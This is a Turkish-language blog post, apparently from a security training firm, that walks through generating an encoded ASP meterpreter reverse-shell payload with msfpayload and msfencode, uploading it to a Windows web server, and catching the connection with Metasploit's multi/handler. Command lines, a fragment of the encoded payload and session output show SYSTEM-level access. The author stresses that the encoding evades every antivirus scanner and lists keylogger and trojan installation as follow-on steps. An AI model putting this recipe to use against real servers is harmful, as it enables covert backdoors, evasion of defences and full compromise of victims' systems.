Windows Web sunuculara yapılan ataklar sonrası, saldırgan sistemde bir arkakapı oluşturmak, sistemde komut çalıştırmak ve yetki yükseltmek için çeşitli web tabanlı scriptler kullanırlar.Bilinen en meşhurları arasında cyberspy5.asp , zehir4.asp, efso.asp ve .net ile yazılmış FSO (file system object) fonksiyonlarını kullanan yazılımlar bulunuyor. Bu tür yazılımların ortak özelliği, FSO kullanarak dosya dizin işlemlerini gerçekleştirmek, sistemde komut çalıştırmak, port açabilmek ve uzak bir sisteme bağlantı gerçekleştirebilmektir.
Bu kadar bilinir olmaları antivirus, kaçak giriş tespit sistemleri ve wep application firewall’lar tarafından kolayca engellenmelerine olanak sağlıyor.
Metasploit Exploit Framework ile, msfpayload ve msfencode yardımcı araçları kullanılarak meterpreter payloadını asp olarak encode edip bind shell veya reverse shell bağlantısı kurulabilir.
Bu örnekte ters bağlantı (reverse connetion) kullanılmıştır.
# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o ajan443.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
ajan443.asp dosyasını asp destekli bir windows sunucuya yükleyip, sayfa çağrıldığında kurban sistemden saldırgan sistemin 443. Portuna bağlantı kurarak kurban sistemin komut satırını saldırgana teslim edecektir.
# cat ajan443.asp
<%
Sub CnpnKLRtlY()
ZkMSe=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)
…..…..
Saldırgan metasploit aracılığı ile meterpreter bağlantısını karşılamak üzere dinleme moduna geçer ve hedefte ajan443.asp dosyası çalıştırıldığında bağlantı gerçekleştirilmiş olur.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.2:443
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 192.168.1.5
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.5:1064) at Tue May 10 06:58:24 -0400 2011
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
Ve hedefte SYSTEM yetkileri ile komut satırını ele geçirmiş olduk.Hedef sistemden ekran görüntüsü alabilir, dosya/dizin işlemelerini gerçekleştirebilir, keylogger/trojan kurabilir, upload/download vb. bir çok işlem gerçekleştirilebilir.
Meterpreter içeriği encode edildiği için antivirusler tarafından da tanınmaz. Bu yazı yayımlandığı tarihte virustotal.com tarama sonucu
Hiç bir antivirus tarafından tanınmıyor.
Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr
1 Yorum
[…] antivirusler tarafından tananınmamasını sağlamak üzere encoding tekniklerinden bahsetmiştik. […]